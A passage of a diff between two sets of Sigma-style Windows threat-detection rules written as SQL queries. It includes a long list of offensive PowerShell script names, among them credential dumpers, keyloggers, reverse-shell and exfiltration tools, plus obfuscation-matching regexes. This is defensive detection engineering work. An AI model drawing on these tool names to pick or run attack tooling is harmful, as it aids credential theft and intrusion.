"Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", - "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": 
"53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Initial installation of a domain controller" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", - "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "status": "test", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to 
launch.\n", - "author": "frack113", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Unknown" + "Companies, who may use these default LDAP-Attributes for personal information" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.discovery", "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ], + "falsepositives": [ + "Go utilities that use staaldraad awesome NTLM library" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 
'%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", - "author": "Florian Roth (Nextron Systems)", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "status": "experimental", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "status": "stable", - 
"description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "status": "test", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - 
"description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename 
LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE 